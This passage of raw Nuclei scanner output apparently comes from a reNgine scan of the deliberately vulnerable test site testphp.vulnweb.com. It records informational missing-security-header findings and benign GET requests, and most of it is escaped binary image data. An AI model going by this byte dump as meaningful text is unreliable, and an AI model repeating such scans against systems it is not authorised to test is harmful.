s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.673254166Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufff